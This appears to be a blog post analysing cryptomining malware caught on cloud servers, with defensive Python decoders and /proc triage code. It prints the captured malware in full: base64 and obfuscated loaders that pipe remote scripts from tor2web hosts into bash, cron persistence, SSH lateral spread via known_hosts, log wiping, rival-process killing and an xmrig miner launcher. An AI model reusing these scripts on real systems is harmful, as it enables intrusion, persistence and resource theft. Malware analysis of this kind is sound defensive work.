Recently the hosted cloud platform has seen a wave of cryptomining malware; anyone without security awareness just ends up quietly paying the "IQ tax".
After being hit several times, we finally caught the intrusion script in the act. Here is a quick analysis of it, in the hope that it gives you a little inspiration.
##An unremarkable little script, base64-encoded, leaving you clueless; if we hadn't found the clue under /proc/PID we would have taken a real beating.
```bash
#!/bin/bash
exec &>/dev/null
sleep $((RANDOM % 600))
{echo,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}|{base64,-d}|bash
```
##Decoding the base64 reveals... well well, this script has ideas.
(At this point an argument broke out with an ops colleague: one held that whoever puts a domain name in the request is an idiot, since a single hosts-file binding for that domain and it's game over, so only a hard-coded IP makes sense; the other held that a hard-coded IP gets filtered by the firewall straight away and it's game over just as fast ---- Schrödinger's ops engineer.)
```bash
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
(wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh ||
 curl -m180 -fsSLkA- rapid7cpfqnwxodo.tor2web.io/cron.sh ||
 wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.d2web.org/cron.sh ||
 curl -m180 -fsSLkA- rapid7cpfqnwxodo.d2web.org/cron.sh ||
 wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.mn/cron.sh ||
 curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.mn/cron.sh ||
 wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.to/cron.sh ||
 curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.to/cron.sh ||
 wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.onion.in.net/cron.sh ||
 curl -m180 -fsSLkA- rapid7cpfqnwxodo.onion.in.net/cron.sh)|bash
```
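A first stage of this shape can be decoded without executing it: pull the base64 out of the `{echo,...}|{base64,-d}|bash` brace-expansion trick, decode it, and list the hosts the decoded stage would fetch from. The following is an added Python example, not code from the original post; the stager text and the `stager-a.example` / `stager-b.example` hosts in it are constructed stand-ins for the real one.

```python
import base64
import re
from typing import List, Optional

# Constructed stand-in for the second stage: same shape as the decoded loader above
# (wget || curl fetch piped to bash) with placeholder hosts instead of the real ones.
STAGE2 = (
    "exec &>/dev/null\n"
    "(wget -t1 -T180 -qU- -O- --no-check-certificate stager-a.example/cron.sh"
    " || curl -m180 -fsSLkA- stager-b.example/cron.sh)|bash\n"
)
# Constructed first stage in the {echo,<b64>}|{base64,-d}|bash form found on the host.
SAMPLE_STAGER = (
    "#!/bin/bash\nexec &>/dev/null\nsleep $((RANDOM % 600))\n"
    "{echo," + base64.b64encode(STAGE2.encode()).decode() + "}|{base64,-d}|bash\n"
)

# Brace expansion lets the loader avoid literal spaces: {echo,X} expands to "echo X".
STAGER_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}\s*\|\s*(?:ba)?sh")
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^|&;()]*")
URL_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)(/[^\s'\"|)]*)?", re.I)

def decode_stager(script: str) -> Optional[str]:
    """Decoded second stage, or None when the text is not a {echo,..}|{base64,-d} loader."""
    m = STAGER_RE.search(script)
    if m is None:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")

def download_targets(stage: str) -> List[str]:
    """host/path targets handed to wget or curl in a decoded stage, in order, no duplicates."""
    targets: List[str] = []
    for cmd in FETCH_RE.findall(stage):
        for host, path in URL_RE.findall(cmd):
            if host + path not in targets:
                targets.append(host + path)
    return targets

def unwrap(script: str, max_depth: int = 5) -> List[str]:
    """Peel nested loaders (a decoded stage may itself be one); returns each decoded layer."""
    layers: List[str] = []
    current = script
    for _ in range(max_depth):
        nxt = decode_stager(current)
        if nxt is None:
            break
        layers.append(nxt)
        current = nxt
    return layers
```

The extracted hosts are what you feed into DNS/proxy logs to find other infected hosts; the script itself never has to run.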
##Following the thread, requesting rapid7cpfqnwxodo.tor2web.io/cron.sh yields the script for the next step; once again heavily obfuscated.
```
[root@hdp-data tmp]# wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh
${*,,}${*^}$BASH${*//m=qNfV1}${!*} <<< "$("${@//G1-s}"''\p${*/MWRqC/$J%f}r'i'$'\156\u0074f' "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"${@##*eL6%W#K}"${@%%KPM5Ry}"|${*/&0%@N/b>\{&S}b"a"${*/Tu#P\[Z/$ufX\)}se$[((${@%6wk^+}-4"#"20+19#b)+2#11)]4 -d"${@//C#Fr\[A-J}"${*})"${*//K>#,w\"7L/kXKsVG}${*#b0l<}
```
##Decoding further, the actual intrusion code gradually emerges. All I can say is that this code is written like a ghost wrote it; anyone who doesn't know shell would be fooled. Let's keep going.
```bash
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
x() {
x=/systemd-login
z=./$(cat /dev/urandom | tr -cd [:alnum:]|head -c 6)
wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z
chmod +x $z;$z;rm -f $z
}
cd /tmp
touch /dev/shm/asdf && cd /dev/shm/
touch /var/tmp/asdf && cd /var/tmp/
touch /usr/bin/asdf && cd /usr/bin/
touch /data/consul/asdf && cd /data/consul/
touch /opt/consul-data/asdf && cd /opt/consul-data/
rm -f /*/*/asdf
for h in aptgetgxqs3secda.tor2web.io aptgetgxqs3secda.onion.to aptgetgxqs3secda.d2web.org aptgetgxqs3secda.onion.in.net aptgetgxqs3secda.tor2web.su
do
if ! ps -p $(cat /tmp/.X1M-unix); then x $h
else break
fi
done
```
##The real purpose of that for loop: fetch a binary executable, hhww123.
##If wget can't get it, fall back to curl:
```bash
wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O hhww123 ||curl -m180 -fsSLkA- aptgetgxqs3secda.tor2web.io/systemd-login -O hhww123
```
##The final operation: grant execute permission, run it, delete the executable:
```bash
chmod +x hhww123; hhww123;rm -f hhww123
```
##And with that the cryptominer has been planted perfectly.
Having read this far, you will notice that intrusion really is this simple. Perhaps because of the Cybersecurity Law and similar reasons, apart from the hhww123 binary (which cannot be decompiled to read its source), this intrusion performs no other malicious operations.
Next, let's look at some intrusion code that is full of malice.
Demo case ①
##This is the first time I have seen such a polite intrusion; so gentlemanly that I kept muttering MMP to myself. If I hadn't seen the pile of rm -rf and kill -9 operations, I would almost have believed it.
```sh
#!/bin/sh
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organizations.
# - We know you feel We are a potential threat, well We ain't.
# - We want to show how tiny vulns could lead to total disasters.
# - We know you feel We are Hypocrite's, because we mine. Well if we don't how the hell we gonna let you know we are in.
# - Please We plead to every one out there don't sabotage this campaign (We want to keep the internet safe).
# - Sometimes you gotta break the rules to make them.
#
#Disclaimer:
#1) We only Wanna Mine.
#2) We don't want your data, or anything or even a ransom.
#3) Please if you find this code, don't post about it.
#4) We make your security better by breaking it.
#
#Contact:
#1) If your server gets infected:
# - We will provide cleanup script.
# - We will share source of entry into your servers and patch (surely).
# - Please if you contacting, please send your affected server's ip and services your run on the server.
# - lets talk via email at: internetrapist@rape.lol
#2) If you want to partner with us ?.
# - Shoot us an email ;).

URL=http://p.6465737472756374696f6e.icu:8080/p
INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3
MINER_PID_FILE="$INSTALL_DIR/mpid"
GUARD_FILE="$INSTALL_DIR/spid"
PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid"
MD5_PROC=2b51d09d8eafb765606ced3b43453c9b
MD5_MINER=ae0f778496c2f1056da3437c7dd2e853
MINER_NAME=bioset
PROC_HANDLER_NAME=proc_1
check_arg=$1

bot_kill() {
    ps aux | grep -i "systemd-0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "vmstat1" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "vmstat0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "jenkins-0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "rpciod0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "kjournald" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "flush-199" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "kblockd0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "hwlh3wlh44lh" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "Circle_MI" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "get.bi-chi.com" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "hashvault.pro" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "nanopool.org" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "bioset-199" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "kauditd0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "/usr/bin/.sshd" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "/usr/bin/bsd-port" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "xmr" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "xig" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "ddgs" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "watchdog_0" | awk '{print $2}' | xargs kill -9
    ps aux | grep -e '[0-9a-f]\{32\}' | awk '{print $2}' | xargs kill -9
    ps aux | grep -e '[0-9a-f]\{33\}' | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "tmp00" | awk '{print $2}' | xargs kill -9
    ps aux | grep -e '[0-9a-f]\{16\}' | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "khugepaged" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "qW3xT" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "wnTKYg" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "t00ls.ru" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "sustes" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "thisxxs" | awk '{print $2}' | xargs kill -9
    netstat -antp | grep ":14444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":3333" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":4444" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":5555" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    netstat -antp | grep ":7777" | awk '{print $7}' | cut -d "/" -f 1 | xargs kill -9
    ps aux | grep -i "hashfish" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i -w "./kworker" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "kworkerds" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "/tmp/devtool" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "systemctI" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "sustse" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "axgt" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "sustse" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "6Tx3Wq" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "dblaunchs" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "migrations" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "kerberods" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "httpdz" | awk '{print $2}' | xargs kill -9
    ps aux | grep -i "qgcd" | awk '{print $2}' | xargs kill -9
    kill -9 "$(cat /tmp/.X11unix)"
    kill -9 "$(cat /tmp/.XImunix)"
    kill -9 "$(cat /tmp/.lsdpid)"
    # pkill -f "/bin/bash"
    # ps aux|grep -v grep|grep -v "/bin/sh"|grep -v "bash"|awk '{if($3>=50.0) print $2}'|xargs kill -9
}

bash_fake_name() {
    nohup bash -c "( exec -a '/bin/bash' /bin/bash ) < $1" >/dev/null 2>&1 &
    sleep 1s
    pkill -f "$PROC_HANDLER_NAME"
    sleep 3s
}

exe_fake_name() {
    nohup bash -c "exec -a '/sbin/init' $1" >/dev/null 2>&1 &
    echo $! > $MINER_PID_FILE
}

run_procs() {
    if [ -w "$INSTALL_DIR" ]; then
        chmod +x $INSTALL_DIR/$MINER_NAME
        chmod +x $INSTALL_DIR/$PROC_HANDLER_NAME
        if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null
        then
            exe_fake_name "./$MINER_NAME"
        fi
        if ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
        then
            if test "$check_arg" != "t"
            then
                bash_fake_name "./$PROC_HANDLER_NAME"
            fi
        fi
    else
        exit 1
    fi
}

getmd5() {
    echo "$(md5sum "$1" | cut -d ' ' -f 1)"
}

install() {
    cd $INSTALL_DIR
    if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER" || test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC"
    then
        kill -9 "$(cat $PROC_HANDLER_PID_FILE)"
        kill -9 "$(cat $MINER_PID_FILE)"
        rm -rf /var/tmp
        rm -rf /tmp
        mkdir -p /tmp
        mkdir -p /var/tmp
        chmod 1777 /var/tmp
        chmod 1777 /tmp
        mkdir -p $INSTALL_DIR
        cd $INSTALL_DIR
        sleep 15s
        mkdir -p $INSTALL_DIR
        cd $INSTALL_DIR
        ARCH=$(getconf LONG_BIT)
        if test "$(getmd5 $PROC_HANDLER_NAME)" != "$MD5_PROC"
        then
            (curl -fsSL -m180 "$URL?a=h" -o "$PROC_HANDLER_NAME"||wget -T180 -q "$URL?a=h" -O "$PROC_HANDLER_NAME")
        fi
        if test "$(getmd5 $MINER_NAME)" != "$MD5_MINER"
        then
            if test "${ARCH}x" = "64x"
            then
                (curl -fsSL -m180 "$URL?a=d&ar=64" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=64" -O "$MINER_NAME")
            else
                (curl -fsSL -m180 "$URL?a=d&ar=86" -o "$MINER_NAME"||wget -T180 -q "$URL?a=d&ar=86" -O "$MINER_NAME")
            fi
        fi
    fi
    run_procs
}

write_cron() {
    crontab -r
    echo "*/10 * * * * (curl -fsSL -m180 \"$URL?a=p&a2=cron\"||wget -q -T180 -O- \"$URL?a=p&a2=cron\")|sh"|crontab -
}

poll() {
    (curl -fsSL -m180 "$URL?a=p"||wget -q -T180 -O- "$URL?a=p")|sh
}

lateral() {
    for h in $(cat /root/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.bash_history /home/*/.bash_history|grep -v "127.0.0.1"|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|sort|uniq); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no "$h" '(curl -fsSL -m180 \"$URL?a=p&a2=lat\"||wget -q -T180 -O- \"$URL?a=p&a2=lat\")|sh >/dev/null 2>&1' &
    done
}

log_clear() {
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    sed -i '/6465737472756374696f6e/d' /var/log/syslog
}

rm -rf /tmp/cron
if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null
then
    echo "$$" > $GUARD_FILE
    bot_kill
    write_cron
    log_clear
    if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null || ! kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
    then
        install
    else
        poll
    fi
    lateral
    log_clear
fi
exit 0
```
###Totally lost: where do I come from, where am I going? That's right: digging backwards through the files, I found the shell step that runs before the script above.
```sh
#!/bin/sh
Check_Repeating_Time=3; # in seconds
Max_CPU_Usage='70.0'; #%
INSTALL_DIR=/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/pavmofp3
MINER_PID_FILE="$INSTALL_DIR/mpid"
PROC_HANDLER_PID_FILE="$INSTALL_DIR/ppid"
GUARD_FILE="$INSTALL_DIR/spid"
POLL_URL=http://p.6465737472756374696f6e.icu:8080/poll
if kill -0 "$(cat $PROC_HANDLER_PID_FILE)" > /dev/null
then
    exit 0
fi
MINER_PID=0
while true
do
    echo "$$" > $PROC_HANDLER_PID_FILE
    if ! kill -0 "$(cat $MINER_PID_FILE)" > /dev/null && ! kill -0 "$MINER_PID" > /dev/null
    then
        if ! kill -0 "$(cat $GUARD_FILE)" > /dev/null
        then
            (curl -fsSL -m180 "$POLL_URL"||wget -q -T180 -O- "$POLL_URL")|sh -s t
        fi
    else
        if [ -e "$MINER_PID_FILE" ]
        then
            MINER_PID="$(cat $MINER_PID_FILE)"
        fi
    fi
    ps aux | awk '{ Proc_Name = $11; CPU_Usage = $3; PID = $2; if((CPU_Usage >= '$Max_CPU_Usage' ) && (PID != '$(cat "$MINER_PID_FILE")') && (PID != '$MINER_PID')) { system ("kill -9 " PID); } }';
    sleep $Check_Repeating_Time\s;
done;
```
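The `exec -a` tricks above (the miner posing as /sbin/init, the handler as /bin/bash) and the first dropper's run-then-delete pattern all leave traces in /proc: argv[0] in /proc/PID/cmdline disagrees with the /proc/PID/exe link, the link ends in "(deleted)", or the binary and working directory sit under /tmp, /var/tmp or /dev/shm. The following is an added Python triage example, not code from the post; the LEGIT_EXE allow-list and the process records used for checking are assumptions constructed for this example.

```python
import os
from dataclasses import dataclass
from typing import Dict, List
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# argv[0] names borrowed above with `exec -a` -> binaries that may legitimately carry them
# (assumed allow-list for this example; extend it per distro).
LEGIT_EXE = {
    "/sbin/init": {"/sbin/init", "/usr/lib/systemd/systemd", "/lib/systemd/systemd"},
    "/bin/bash": {"/bin/bash", "/usr/bin/bash"},
}

@dataclass
class Proc:
    pid: int
    argv0: str  # first NUL-separated field of /proc/PID/cmdline
    exe: str    # readlink of /proc/PID/exe; ends in " (deleted)" once the file is unlinked
    cwd: str    # readlink of /proc/PID/cwd

def in_scratch(path: str) -> bool:
    return any(path == d or path.startswith(d + "/") for d in SCRATCH_DIRS)

def assess(p: Proc) -> List[str]:
    """Indicators matched by one process; an empty list means nothing suspicious."""
    findings: List[str] = []
    deleted = p.exe.endswith(" (deleted)")
    real = p.exe[: -len(" (deleted)")] if deleted else p.exe
    if deleted:
        findings.append("exe unlinked after launch")
    if in_scratch(real) or in_scratch(p.cwd):
        findings.append("runs from world-writable scratch dir")
    allowed = LEGIT_EXE.get(p.argv0)
    if allowed is not None and real not in allowed:
        findings.append(f"argv[0] {p.argv0} masquerades over {real}")
    elif allowed is None and p.argv0.startswith("/") and os.path.basename(p.argv0) != os.path.basename(real):
        # generic exec -a check; symlinked interpreters (python3 -> python3.x) need an allow-list entry
        findings.append(f"argv[0] {p.argv0} does not match exe {real}")
    return findings

def scan_live() -> Dict[int, List[str]]:
    """pid -> findings over the real /proc (Linux only); entries that cannot be read are skipped."""
    hits: Dict[int, List[str]] = {}
    for d in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{d}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode("utf-8", "replace")
            p = Proc(int(d), argv0, os.readlink(f"/proc/{d}/exe"), os.readlink(f"/proc/{d}/cwd"))
        except OSError:
            continue
        if assess(p):
            hits[p.pid] = assess(p)
    return hits
```

Run `scan_live()` as root so the exe/cwd links of other users' processes are readable; a hit on "masquerades over" is worth far more than the process name alone, because `ps` only shows the borrowed argv[0].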
Demo case ②
##This one is serious; before the intrusion it must have done a brute-force guess of weak root passwords.
(Note: before this I once found a .pw password dictionary; no idea which expert it belonged to, but it enumerated a good two or three hundred thousand weak passwords, so password login for the root user looks precarious. But if everything uses key-based login, it puts great pressure on the core bastion host: once a single intrusion succeeds, a mere cat /root/.ssh/known_hosts yields the host records and the whole family gets taken out together.)
```bash
#!/bin/bash
if [[ $(whoami) != "root" ]]; then
  for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do kill -9 $tr || : ; done;
fi
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
_curl () {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
    [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}
rm -rf config.json;
d () {
  curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
}
#test ! -s trace && \
#  (d http://87.44.19.162/job/Insecure-Jenkins/ws/trace trace || \
#   d http://54.88.236.33/job/Insecure-Jenkins/ws/trace trace)
test ! -s trace && \
  d https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz trace.tgz && \
  tar -zxvf trace.tgz && \
  mv xmrig-2.14.1/xmrig trace && \
  rm -rf xmrig-2.14.1 && \
  rm -rf trace.tgz;
test ! -x trace && chmod +x trace;
k() {
  ./trace \
    --algo cn/double \
    -r 100 \
    -R 100 \
    --keepalive \
    --no-color \
    --donate-level 1 \
    --max-cpu-usage 95 \
    --cpu-priority 3 \
    --print-time 25 \
    --threads ${threadCount:-4} \
    --url $1 \
    --user XCBzxb7igt5YvbwtYCMPkEWRATpzrMYvU2PpTDi89bon7fYnJgYSeRS8EN5LLnPxgkgfsf3k1DZVn1bzccTFBNhpPGbJGGkskmrSg3EGmoSsQH \
    --pass 82b08f53 \
    --keepalive
}
k eu.XCA.cryptopool.space:5555 || k Pool.XCA.CryptoPool.Space:5555
```
Summary:
Security is only ever relative; there is no such thing as absolute security.
For the cryptominers above, as long as the source of the intrusion is unknown,
you can only treat the symptoms rather than the cause: disable the relevant network components, or prevent irreversible commands from being executed;
for example: wget, curl, rm, kill, echo, and so on.